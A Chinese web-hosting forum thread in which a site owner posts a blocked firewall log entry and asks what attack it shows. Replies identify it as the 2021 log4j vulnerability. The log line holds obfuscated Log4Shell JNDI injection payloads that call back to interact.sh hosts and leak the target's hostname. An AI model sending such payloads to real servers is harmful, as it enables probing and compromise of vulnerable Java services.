全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

IP归属甄别会员请立即修改密码
查看: 709|回复: 7
打印 上一主题 下一主题

这是个什么攻击方式?

[复制链接]
跳转到指定楼层
1#
发表于 2021-12-14 10:41:08 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今早看了下日志,发现有一条这样的的记录

  1. {"client_ip":"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}:\/\/${hostName}.c6rr05cpu892m69lgpo0cg5hgzabws7gc.interact.sh}","local_time":"2021-12-14 05:58:45","server_name":"xxx.com","req_url":"\/?x=${jndi:ldap:\/\/${hostName}.c6rr05cpu892m69lgpo0cg5hgzabws7gg.interact.sh\/a}","attack_method":"Deny_URL_Args","req_data":"-","rule_tag":"\\$\\{","user_agent":"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:\/\/${hostName}.c6rr05cpu892m69lgpo0cg5hgzabws7ge.interact.sh}"}
复制代码


居然看不到IP,有带老懂吗
推荐
发表于 2021-12-14 11:20:33 | 只看该作者
正在 Ping c6rr05cpu892m69lgpo0cg5hgzabws7gc.interact.sh [46.101.25.250] 具有 32 字节的数据:
来自 46.101.25.250 的回复: 字节=32 时间=176ms TTL=47
来自 46.101.25.250 的回复: 字节=32 时间=175ms TTL=47
来自 46.101.25.250 的回复: 字节=32 时间=176ms TTL=47
来自 46.101.25.250 的回复: 字节=32 时间=176ms TTL=47
2#
发表于 2021-12-14 10:44:47 | 只看该作者
这不就是大红大紫的log4j漏洞么。
3#
发表于 2021-12-14 11:09:48 来自手机 | 只看该作者
是 log4j2 漏洞,互联网的小学生都知道了
4#
发表于 2021-12-14 11:11:20 | 只看该作者
loliwin 发表于 2021-12-14 10:44
这不就是大红大紫的log4j漏洞么。

wp 小站 需要怕吗?
5#
发表于 2021-12-14 11:18:34 | 只看该作者
wp站不是PHP的嘛,log4j好像是java项目的。是不是有其他组件用到了。没看到IP地址,但是他里面不是有域名嘛.sh的域名
7#
发表于 2021-12-14 11:20:55 | 只看该作者
昨天好几个网站都碰到了这个,宝塔的防火墙还是可以的,都给拦截了
8#
发表于 2021-12-14 11:34:04 | 只看该作者
Apache关我nginx什么事
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2026-1-7 07:57 , Processed in 0.060421 second(s), 11 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表